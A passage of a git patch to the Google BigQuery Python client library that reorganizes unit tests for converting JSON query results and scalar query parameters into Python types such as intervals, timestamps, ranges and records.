09:09:09.090909", + relativedelta(hours=9, minutes=9, seconds=9, microseconds=90909), + ), + ( + "0-0 0 11:11:11.111111", + relativedelta(hours=11, minutes=11, seconds=11, microseconds=111111), + ), + ( + "0-0 0 19:16:23.987654", + relativedelta(hours=19, minutes=16, seconds=23, microseconds=987654), + ), + # Nanoseconds are not expected, but should not cause error. 
+ ("0-0 0 0:0:00.123456789", relativedelta(microseconds=123456)), + ("0-0 0 0:0:59.87654321", relativedelta(seconds=59, microseconds=876543)), + ), +) +def test_interval_to_py_w_string_values(object_under_test, value, expected): + got = object_under_test.interval_to_py(value, create_field()) + assert got == expected + + +def test_integer_to_py_w_string_value(object_under_test): + coerced = object_under_test.integer_to_py("42", object()) + assert coerced == 42 + + +def test_integer_to_py_w_float_value(object_under_test): + coerced = object_under_test.integer_to_py(42.0, object()) + assert coerced == 42 + + +def test_json_to_py_w_json_field(object_under_test): + data_field = create_field("REQUIRED", "data", "JSON") + + value = json.dumps( + {"v": {"key": "value"}}, + ) + + expected_output = {"v": {"key": "value"}} + coerced_output = object_under_test.json_to_py(value, data_field) + assert coerced_output == expected_output + + +def test_json_to_py_w_string_value(object_under_test): + coerced = object_under_test.json_to_py('"foo"', create_field()) + assert coerced == "foo" + + +def test_float_to_py_w_string_value(object_under_test): + coerced = object_under_test.float_to_py("3.1415", object()) + assert coerced == 3.1415 + + +def test_float_to_py_w_float_value(object_under_test): + coerced = object_under_test.float_to_py(3.1415, object()) + assert coerced == 3.1415 + + +def test_numeric_to_py_w_string_value(object_under_test): + coerced = object_under_test.numeric_to_py("3.1415", object()) + assert coerced == decimal.Decimal("3.1415") + + +def test_numeric_to_py_w_float_value(object_under_test): + coerced = object_under_test.numeric_to_py(3.1415, object()) + # There is no exact float representation of 3.1415. 
+ assert coerced == decimal.Decimal(3.1415) + + +def test_bool_to_py_w_value_t(object_under_test): + coerced = object_under_test.bool_to_py("T", object()) + assert coerced is True + + +def test_bool_to_py_w_value_true(object_under_test): + coerced = object_under_test.bool_to_py("True", object()) + assert coerced is True + + +def test_bool_to_py_w_value_1(object_under_test): + coerced = object_under_test.bool_to_py("1", object()) + assert coerced is True + + +def test_bool_to_py_w_value_other(object_under_test): + coerced = object_under_test.bool_to_py("f", object()) + assert coerced is False + + +def test_string_to_py_w_string_value(object_under_test): + coerced = object_under_test.string_to_py("Wonderful!", object()) + assert coerced == "Wonderful!" + + +def test_bytes_to_py_w_base64_encoded_bytes(object_under_test): + expected = b"Wonderful!" + encoded = base64.standard_b64encode(expected) + coerced = object_under_test.bytes_to_py(encoded, object()) + assert coerced == expected + + +def test_bytes_to_py_w_base64_encoded_text(object_under_test): + expected = b"Wonderful!" 
+ encoded = base64.standard_b64encode(expected).decode("ascii") + coerced = object_under_test.bytes_to_py(encoded, object()) + assert coerced == expected + + +def test_timestamp_to_py_w_string_int_value(object_under_test): + from google.cloud._helpers import _EPOCH + + coerced = object_under_test.timestamp_to_py("1234567", object()) + assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) + + +def test_timestamp_to_py_w_int_value(object_under_test): + from google.cloud._helpers import _EPOCH + + coerced = object_under_test.timestamp_to_py(1234567, object()) + assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) + + +def test_datetime_to_py_w_string_value(object_under_test): + coerced = object_under_test.datetime_to_py("2016-12-02T18:51:33", object()) + assert coerced == datetime.datetime(2016, 12, 2, 18, 51, 33) + + +def test_datetime_to_py_w_microseconds(object_under_test): + coerced = object_under_test.datetime_to_py("2015-05-22T10:11:12.987654", object()) + assert coerced == datetime.datetime(2015, 5, 22, 10, 11, 12, 987654) + + +def test_date_to_py_w_string_value(object_under_test): + coerced = object_under_test.date_to_py("1987-09-22", object()) + assert coerced == datetime.date(1987, 9, 22) + + +def test_time_to_py_w_string_value(object_under_test): + coerced = object_under_test.time_to_py("12:12:27", object()) + assert coerced == datetime.time(12, 12, 27) + + +def test_time_to_py_w_subsecond_string_value(object_under_test): + coerced = object_under_test.time_to_py("12:12:27.123456", object()) + assert coerced == datetime.time(12, 12, 27, 123456) + + +def test_time_to_py_w_bogus_string_value(object_under_test): + with pytest.raises(ValueError): + object_under_test.time_to_py("12:12:27.123", object()) + + +def test_range_to_py_w_wrong_format(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type="DATE", + ) + with pytest.raises(ValueError): + 
object_under_test.range_to_py("[2009-06-172019-06-17)", range_field) + + +def test_range_to_py_w_wrong_element_type(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type=google.cloud.bigquery.schema.FieldElementType( + element_type="TIME" + ), + ) + with pytest.raises(ValueError): + object_under_test.range_to_py("[15:31:38, 15:50:38)", range_field) + + +def test_range_to_py_w_unbounded_value(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type="DATE", + ) + coerced = object_under_test.range_to_py("[UNBOUNDED, 2019-06-17)", range_field) + assert coerced == {"start": None, "end": datetime.date(2019, 6, 17)} + + +def test_range_to_py_w_date_value(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type="DATE", + ) + coerced = object_under_test.range_to_py("[2009-06-17, 2019-06-17)", range_field) + assert coerced == { + "start": datetime.date(2009, 6, 17), + "end": datetime.date(2019, 6, 17), + } + + +def test_range_to_py_w_datetime_value(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type=google.cloud.bigquery.schema.FieldElementType( + element_type="DATETIME" + ), + ) + coerced = object_under_test.range_to_py( + "[2009-06-17T13:45:30, 2019-06-17T13:45:30)", range_field + ) + assert coerced == { + "start": datetime.datetime(2009, 6, 17, 13, 45, 30), + "end": datetime.datetime(2019, 6, 17, 13, 45, 30), + } + + +def test_range_to_py_w_timestamp_value(object_under_test): + from google.cloud._helpers import _EPOCH + + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type=google.cloud.bigquery.schema.FieldElementType( + element_type="TIMESTAMP" + ), + ) + coerced = object_under_test.range_to_py("[1234567, 1234789)", range_field) + assert coerced == { + "start": _EPOCH + datetime.timedelta(seconds=1, microseconds=234567), + "end": _EPOCH + datetime.timedelta(seconds=1, 
microseconds=234789), + } + + +def test_record_to_py_w_nullable_subfield_none(object_under_test): + subfield = create_field("NULLABLE", "INTEGER", name="age") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": None}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"age": None} + + +def test_record_to_py_w_scalar_subfield(object_under_test): + subfield = create_field("REQUIRED", "INTEGER", name="age") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": 42}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"age": 42} + + +def test_record_to_py_w_scalar_subfield_geography(object_under_test): + subfield = create_field("REQUIRED", "GEOGRAPHY", name="geo") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": "POINT(1, 2)"}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"geo": "POINT(1, 2)"} + + +def test_record_to_py_w_repeated_subfield(object_under_test): + subfield = create_field("REPEATED", "STRING", name="color") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": [{"v": "red"}, {"v": "yellow"}, {"v": "blue"}]}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"color": ["red", "yellow", "blue"]} + + +def test_record_to_py_w_record_subfield(object_under_test): + full_name = create_field("REQUIRED", "STRING", name="full_name") + area_code = create_field("REQUIRED", "STRING", name="area_code") + local_number = create_field("REQUIRED", "STRING", name="local_number") + rank = create_field("REQUIRED", "INTEGER", name="rank") + phone = create_field( + "NULLABLE", "RECORD", name="phone", fields=[area_code, local_number, rank] + ) + person = create_field( + "REQUIRED", "RECORD", name="person", fields=[full_name, phone] + ) + value = { + "f": [ + {"v": "Phred Phlyntstone"}, + {"v": {"f": [{"v": "800"}, {"v": "555-1212"}, {"v": 1}]}}, + ] + } + expected = { 
+ "full_name": "Phred Phlyntstone", + "phone": {"area_code": "800", "local_number": "555-1212", "rank": 1}, + } + coerced = object_under_test.record_to_py(value, person) + assert coerced == expected diff --git a/tests/unit/_helpers/test_from_json.py b/tests/unit/_helpers/test_from_json.py deleted file mode 100644 index 65b054f44..000000000 --- a/tests/unit/_helpers/test_from_json.py +++ /dev/null @@ -1,157 +0,0 @@ -# Copyright 2021 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from dateutil.relativedelta import relativedelta -import pytest - -from google.cloud.bigquery.schema import SchemaField - - -def create_field(mode="NULLABLE", type_="IGNORED"): - return SchemaField("test_field", type_, mode=mode) - - -@pytest.fixture -def mut(): - from google.cloud.bigquery import _helpers - - return _helpers - - -def test_interval_from_json_w_none_nullable(mut): - got = mut._interval_from_json(None, create_field()) - assert got is None - - -def test_interval_from_json_w_none_required(mut): - with pytest.raises(TypeError): - mut._interval_from_json(None, create_field(mode="REQUIRED")) - - -def test_interval_from_json_w_invalid_format(mut): - with pytest.raises(ValueError, match="NOT_AN_INTERVAL"): - mut._interval_from_json("NOT_AN_INTERVAL", create_field()) - - -@pytest.mark.parametrize( - ("value", "expected"), - ( - ("0-0 0 0:0:0", relativedelta()), - # SELECT INTERVAL X YEAR - ("-10000-0 0 0:0:0", relativedelta(years=-10000)), - ("-1-0 0 0:0:0", 
relativedelta(years=-1)), - ("1-0 0 0:0:0", relativedelta(years=1)), - ("10000-0 0 0:0:0", relativedelta(years=10000)), - # SELECT INTERVAL X MONTH - ("-0-11 0 0:0:0", relativedelta(months=-11)), - ("-0-1 0 0:0:0", relativedelta(months=-1)), - ("0-1 0 0:0:0", relativedelta(months=1)), - ("0-11 0 0:0:0", relativedelta(months=11)), - # SELECT INTERVAL X DAY - ("0-0 -3660000 0:0:0", relativedelta(days=-3660000)), - ("0-0 -1 0:0:0", relativedelta(days=-1)), - ("0-0 1 0:0:0", relativedelta(days=1)), - ("0-0 3660000 0:0:0", relativedelta(days=3660000)), - # SELECT INTERVAL X HOUR - ("0-0 0 -87840000:0:0", relativedelta(hours=-87840000)), - ("0-0 0 -1:0:0", relativedelta(hours=-1)), - ("0-0 0 1:0:0", relativedelta(hours=1)), - ("0-0 0 87840000:0:0", relativedelta(hours=87840000)), - # SELECT INTERVAL X MINUTE - ("0-0 0 -0:59:0", relativedelta(minutes=-59)), - ("0-0 0 -0:1:0", relativedelta(minutes=-1)), - ("0-0 0 0:1:0", relativedelta(minutes=1)), - ("0-0 0 0:59:0", relativedelta(minutes=59)), - # SELECT INTERVAL X SECOND - ("0-0 0 -0:0:59", relativedelta(seconds=-59)), - ("0-0 0 -0:0:1", relativedelta(seconds=-1)), - ("0-0 0 0:0:1", relativedelta(seconds=1)), - ("0-0 0 0:0:59", relativedelta(seconds=59)), - # SELECT (INTERVAL -1 SECOND) / 1000000 - ("0-0 0 -0:0:0.000001", relativedelta(microseconds=-1)), - ("0-0 0 -0:0:59.999999", relativedelta(seconds=-59, microseconds=-999999)), - ("0-0 0 -0:0:59.999", relativedelta(seconds=-59, microseconds=-999000)), - ("0-0 0 0:0:59.999", relativedelta(seconds=59, microseconds=999000)), - ("0-0 0 0:0:59.999999", relativedelta(seconds=59, microseconds=999999)), - # Test with multiple digits in each section. 
- ( - "32-11 45 67:16:23.987654", - relativedelta( - years=32, - months=11, - days=45, - hours=67, - minutes=16, - seconds=23, - microseconds=987654, - ), - ), - ( - "-32-11 -45 -67:16:23.987654", - relativedelta( - years=-32, - months=-11, - days=-45, - hours=-67, - minutes=-16, - seconds=-23, - microseconds=-987654, - ), - ), - # Test with mixed +/- sections. - ( - "9999-9 -999999 9999999:59:59.999999", - relativedelta( - years=9999, - months=9, - days=-999999, - hours=9999999, - minutes=59, - seconds=59, - microseconds=999999, - ), - ), - # Test with fraction that is not microseconds. - ("0-0 0 0:0:42.", relativedelta(seconds=42)), - ("0-0 0 0:0:59.1", relativedelta(seconds=59, microseconds=100000)), - ("0-0 0 0:0:0.12", relativedelta(microseconds=120000)), - ("0-0 0 0:0:0.123", relativedelta(microseconds=123000)), - ("0-0 0 0:0:0.1234", relativedelta(microseconds=123400)), - # Fractional seconds can cause rounding problems if cast to float. See: - # https://github.com/googleapis/python-db-dtypes-pandas/issues/18 - ("0-0 0 0:0:59.876543", relativedelta(seconds=59, microseconds=876543)), - ( - "0-0 0 01:01:01.010101", - relativedelta(hours=1, minutes=1, seconds=1, microseconds=10101), - ), - ( - "0-0 0 09:09:09.090909", - relativedelta(hours=9, minutes=9, seconds=9, microseconds=90909), - ), - ( - "0-0 0 11:11:11.111111", - relativedelta(hours=11, minutes=11, seconds=11, microseconds=111111), - ), - ( - "0-0 0 19:16:23.987654", - relativedelta(hours=19, minutes=16, seconds=23, microseconds=987654), - ), - # Nanoseconds are not expected, but should not cause error. 
- ("0-0 0 0:0:00.123456789", relativedelta(microseconds=123456)), - ("0-0 0 0:0:59.87654321", relativedelta(seconds=59, microseconds=876543)), - ), -) -def test_w_string_values(mut, value, expected): - got = mut._interval_from_json(value, create_field()) - assert got == expected diff --git a/tests/unit/_helpers/test_scalar_query_param_parser.py b/tests/unit/_helpers/test_scalar_query_param_parser.py new file mode 100644 index 000000000..8e0d2a34e --- /dev/null +++ b/tests/unit/_helpers/test_scalar_query_param_parser.py @@ -0,0 +1,93 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import datetime + +import pytest + +import google.cloud.bigquery.schema + + +def create_field(mode="NULLABLE", type_="IGNORED"): + return google.cloud.bigquery.schema.SchemaField("test_field", type_, mode=mode) + + +@pytest.fixture +def mut(): + from google.cloud.bigquery import _helpers + + return _helpers + + +@pytest.fixture +def object_under_test(mut): + return mut.SCALAR_QUERY_PARAM_PARSER + + +def test_timestamp_to_py_w_none_nullable(object_under_test): + assert object_under_test.timestamp_to_py(None, create_field()) is None + + +@pytest.mark.parametrize( + ("value", "expected"), + [ + ( + "2016-12-20 15:58:27.339328+00:00", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20 15:58:27+00:00", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ( + "2016-12-20T15:58:27.339328+00:00", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20T15:58:27+00:00", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ( + "2016-12-20 15:58:27.339328Z", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20 15:58:27Z", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ( + "2016-12-20T15:58:27.339328Z", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20T15:58:27Z", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ], +) +def test_timestamp_to_py_w_timestamp_valid(object_under_test, value, expected): + assert object_under_test.timestamp_to_py(value, create_field()) == expected + + +def test_timestamp_to_py_w_timestamp_invalid(object_under_test): + with pytest.raises(ValueError): + object_under_test.timestamp_to_py("definitely-not-a-timestamp", create_field()) diff --git a/tests/unit/test__helpers.py 
b/tests/unit/test__helpers.py index adba6327c..4e53236e3 100644 --- a/tests/unit/test__helpers.py +++ b/tests/unit/test__helpers.py @@ -12,7 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -import base64 import datetime import decimal import json @@ -133,484 +132,6 @@ def test_w_value(self): self.assertTrue(self._call_fut(object(), object())) -class Test_int_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _int_from_json - - return _int_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("42", object()) - self.assertEqual(coerced, 42) - - def test_w_float_value(self): - coerced = self._call_fut(42, object()) - self.assertEqual(coerced, 42) - - -class Test_json_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _json_from_json - - return _json_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_json_field(self): - data_field = _Field("REQUIRED", "data", "JSON") - - value = json.dumps( - {"v": {"key": "value"}}, - ) - - expected_output = {"v": {"key": "value"}} - coerced_output = self._call_fut(value, data_field) - self.assertEqual(coerced_output, expected_output) - - def test_w_string_value(self): - coerced = self._call_fut('"foo"', object()) - self.assertEqual(coerced, "foo") - - -class Test_float_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _float_from_json - - return 
_float_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("3.1415", object()) - self.assertEqual(coerced, 3.1415) - - def test_w_float_value(self): - coerced = self._call_fut(3.1415, object()) - self.assertEqual(coerced, 3.1415) - - -class Test_decimal_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _decimal_from_json - - return _decimal_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("3.1415", object()) - self.assertEqual(coerced, decimal.Decimal("3.1415")) - - def test_w_float_value(self): - coerced = self._call_fut(3.1415, object()) - # There is no exact float representation of 3.1415. 
- self.assertEqual(coerced, decimal.Decimal(3.1415)) - - -class Test_bool_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _bool_from_json - - return _bool_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(AttributeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_value_t(self): - coerced = self._call_fut("T", object()) - self.assertTrue(coerced) - - def test_w_value_true(self): - coerced = self._call_fut("True", object()) - self.assertTrue(coerced) - - def test_w_value_1(self): - coerced = self._call_fut("1", object()) - self.assertTrue(coerced) - - def test_w_value_other(self): - coerced = self._call_fut("f", object()) - self.assertFalse(coerced) - - -class Test_string_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _string_from_json - - return _string_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - self.assertIsNone(self._call_fut(None, _Field("REQUIRED"))) - - def test_w_string_value(self): - coerced = self._call_fut("Wonderful!", object()) - self.assertEqual(coerced, "Wonderful!") - - -class Test_bytes_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _bytes_from_json - - return _bytes_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_base64_encoded_bytes(self): - expected = b"Wonderful!" 
- encoded = base64.standard_b64encode(expected) - coerced = self._call_fut(encoded, object()) - self.assertEqual(coerced, expected) - - def test_w_base64_encoded_text(self): - expected = b"Wonderful!" - encoded = base64.standard_b64encode(expected).decode("ascii") - coerced = self._call_fut(encoded, object()) - self.assertEqual(coerced, expected) - - -class Test_timestamp_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _timestamp_from_json - - return _timestamp_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_int_value(self): - from google.cloud._helpers import _EPOCH - - coerced = self._call_fut("1234567", object()) - self.assertEqual( - coerced, _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) - ) - - def test_w_int_value(self): - from google.cloud._helpers import _EPOCH - - coerced = self._call_fut(1234567, object()) - self.assertEqual( - coerced, _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) - ) - - -class Test_timestamp_query_param_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery import _helpers - - return _helpers._timestamp_query_param_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_timestamp_valid(self): - from google.cloud._helpers import UTC - - samples = [ - ( - "2016-12-20 15:58:27.339328+00:00", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20 15:58:27+00:00", - datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27.339328+00:00", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27+00:00", - 
datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ( - "2016-12-20 15:58:27.339328Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20 15:58:27Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27.339328Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ] - for timestamp_str, expected_result in samples: - self.assertEqual( - self._call_fut(timestamp_str, _Field("NULLABLE")), expected_result - ) - - def test_w_timestamp_invalid(self): - with self.assertRaises(ValueError): - self._call_fut("definitely-not-a-timestamp", _Field("NULLABLE")) - - -class Test_datetime_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _datetime_from_json - - return _datetime_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("2016-12-02T18:51:33", object()) - self.assertEqual(coerced, datetime.datetime(2016, 12, 2, 18, 51, 33)) - - def test_w_microseconds(self): - coerced = self._call_fut("2015-05-22T10:11:12.987654", object()) - self.assertEqual(coerced, datetime.datetime(2015, 5, 22, 10, 11, 12, 987654)) - - -class Test_date_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _date_from_json - - return _date_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = 
self._call_fut("1987-09-22", object()) - self.assertEqual(coerced, datetime.date(1987, 9, 22)) - - -class Test_time_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _time_from_json - - return _time_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("12:12:27", object()) - self.assertEqual(coerced, datetime.time(12, 12, 27)) - - def test_w_subsecond_string_value(self): - coerced = self._call_fut("12:12:27.123456", object()) - self.assertEqual(coerced, datetime.time(12, 12, 27, 123456)) - - def test_w_bogus_string_value(self): - with self.assertRaises(ValueError): - self._call_fut("12:12:27.123", object()) - - -class Test_range_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _range_from_json - - return _range_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_wrong_format(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="DATE"), - ) - with self.assertRaises(ValueError): - self._call_fut("[2009-06-172019-06-17)", range_field) - - def test_w_wrong_element_type(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="TIME"), - ) - with self.assertRaises(ValueError): - self._call_fut("[15:31:38, 15:50:38)", range_field) - - def test_w_unbounded_value(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", 
element_type="DATE"), - ) - coerced = self._call_fut("[UNBOUNDED, 2019-06-17)", range_field) - self.assertEqual( - coerced, - {"start": None, "end": datetime.date(2019, 6, 17)}, - ) - - def test_w_date_value(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="DATE"), - ) - coerced = self._call_fut("[2009-06-17, 2019-06-17)", range_field) - self.assertEqual( - coerced, - { - "start": datetime.date(2009, 6, 17), - "end": datetime.date(2019, 6, 17), - }, - ) - - def test_w_datetime_value(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="DATETIME"), - ) - coerced = self._call_fut( - "[2009-06-17T13:45:30, 2019-06-17T13:45:30)", range_field - ) - self.assertEqual( - coerced, - { - "start": datetime.datetime(2009, 6, 17, 13, 45, 30), - "end": datetime.datetime(2019, 6, 17, 13, 45, 30), - }, - ) - - def test_w_timestamp_value(self): - from google.cloud._helpers import _EPOCH - - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="TIMESTAMP"), - ) - coerced = self._call_fut("[1234567, 1234789)", range_field) - self.assertEqual( - coerced, - { - "start": _EPOCH + datetime.timedelta(seconds=1, microseconds=234567), - "end": _EPOCH + datetime.timedelta(seconds=1, microseconds=234789), - }, - ) - - -class Test_record_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _record_from_json - - return _record_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_nullable_subfield_none(self): - subfield = _Field("NULLABLE", "age", "INTEGER") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": None}]} - coerced = 
self._call_fut(value, field) - self.assertEqual(coerced, {"age": None}) - - def test_w_scalar_subfield(self): - subfield = _Field("REQUIRED", "age", "INTEGER") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": 42}]} - coerced = self._call_fut(value, field) - self.assertEqual(coerced, {"age": 42}) - - def test_w_scalar_subfield_geography(self): - subfield = _Field("REQUIRED", "geo", "GEOGRAPHY") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": "POINT(1, 2)"}]} - coerced = self._call_fut(value, field) - self.assertEqual(coerced, {"geo": "POINT(1, 2)"}) - - def test_w_repeated_subfield(self): - subfield = _Field("REPEATED", "color", "STRING") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": [{"v": "red"}, {"v": "yellow"}, {"v": "blue"}]}]} - coerced = self._call_fut(value, field) - self.assertEqual(coerced, {"color": ["red", "yellow", "blue"]}) - - def test_w_record_subfield(self): - full_name = _Field("REQUIRED", "full_name", "STRING") - area_code = _Field("REQUIRED", "area_code", "STRING") - local_number = _Field("REQUIRED", "local_number", "STRING") - rank = _Field("REQUIRED", "rank", "INTEGER") - phone = _Field( - "NULLABLE", "phone", "RECORD", fields=[area_code, local_number, rank] - ) - person = _Field("REQUIRED", "person", "RECORD", fields=[full_name, phone]) - value = { - "f": [ - {"v": "Phred Phlyntstone"}, - {"v": {"f": [{"v": "800"}, {"v": "555-1212"}, {"v": 1}]}}, - ] - } - expected = { - "full_name": "Phred Phlyntstone", - "phone": {"area_code": "800", "local_number": "555-1212", "rank": 1}, - } - coerced = self._call_fut(value, person) - self.assertEqual(coerced, expected) - - class Test_field_to_index_mapping(unittest.TestCase): def _call_fut(self, schema): from google.cloud.bigquery._helpers import _field_to_index_mapping From 968020d5be9d2a30b90d046eaf52f91bb2c70911 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Thu, 20 Mar 2025 11:08:48 -0500 Subject: 
